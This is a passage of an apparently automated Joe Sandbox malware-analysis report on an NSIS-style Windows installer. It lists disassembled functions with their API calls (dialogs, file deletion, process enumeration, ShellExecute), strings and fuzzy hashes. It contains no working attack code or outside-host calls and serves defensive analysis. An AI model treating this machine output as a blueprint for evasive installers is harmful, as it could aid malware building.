                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                          • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                          • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                          • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                          • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                          • String ID: $ @$M$N
                                                                          • API String ID: 1638840714-3479655940
                                                                          • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                          • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                          • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                          • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                          Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                          • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                          • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                          • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                          • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                          • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                          • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                          • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                            • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                            • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000), ref: 00403E8F
                                                                          • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                          • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                          • String ID: 82D$@%F$@rD$A
                                                                          • API String ID: 3347642858-1086125096
                                                                          • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                          • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                          • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                          • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                          Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                          • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                          • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                          • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                          • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                          • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                          • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                          • API String ID: 1916479912-1189179171
                                                                          • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                          • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                          • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                          • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                          Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                          • lstrcatW.KERNEL32(0045C918,\*.*), ref: 00406D09
                                                                          • lstrcatW.KERNEL32(?,00408838), ref: 00406D29
                                                                          • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                          • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                          • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                          • FindClose.KERNEL32(?), ref: 00406E33
                                                                          Strings
                                                                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                          • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                          • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                          • \*.*, xrefs: 00406D03
                                                                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                          • API String ID: 2035342205-3294556389
                                                                          • Opcode ID: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                                                                          • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                          • Opcode Fuzzy Hash: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                                                                          • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                          Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                          • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                          • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                          • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                          • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                          • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                          • API String ID: 3581403547-784952888
                                                                          • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                          • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                          • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                          • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                          Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                          Strings
                                                                          • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInstance
                                                                          • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                          • API String ID: 542301482-1377821865
                                                                          • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                          • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                          • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                          • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                          Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: FileFindFirst
                                                                          • String ID:
                                                                          • API String ID: 1974802433-0
                                                                          • Opcode ID: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                                                                          • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                          • Opcode Fuzzy Hash: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                                                                          • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                          Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                          • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                          • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                            • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                          • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                          • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                          • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                          • API String ID: 20674999-2124804629
                                                                          • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                          • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                          • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                          • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                          Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                          • ShowWindow.USER32(?), ref: 004054D2
                                                                          • DestroyWindow.USER32 ref: 004054E6
                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                          • GetDlgItem.USER32(?,?), ref: 00405523
                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                          • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                          • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                          • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                          • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                          • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                          • EnableWindow.USER32(?,?), ref: 0040573C
                                                                          • EnableWindow.USER32(?,?), ref: 00405757
                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                          • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                          • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                          • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                          • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                          • String ID: @rD
                                                                          • API String ID: 184305955-3814967855
                                                                          • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                          • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                          • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                          • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                                                          Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                          • GetSysColor.USER32(?), ref: 004041AF
                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                          • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                            • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                          • SendMessageW.USER32(00000000), ref: 00404251
                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                          • SetCursor.USER32(00000000), ref: 004042D2
                                                                          • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                          • SetCursor.USER32(00000000), ref: 004042F6
                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                          • String ID: @%F$N$open
                                                                          • API String ID: 3928313111-3849437375
                                                                          • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                          • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                          • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                          • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                          Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • lstrcpyW.KERNEL32(0045B2C8,NUL), ref: 00406AA9
                                                                          • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                          • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
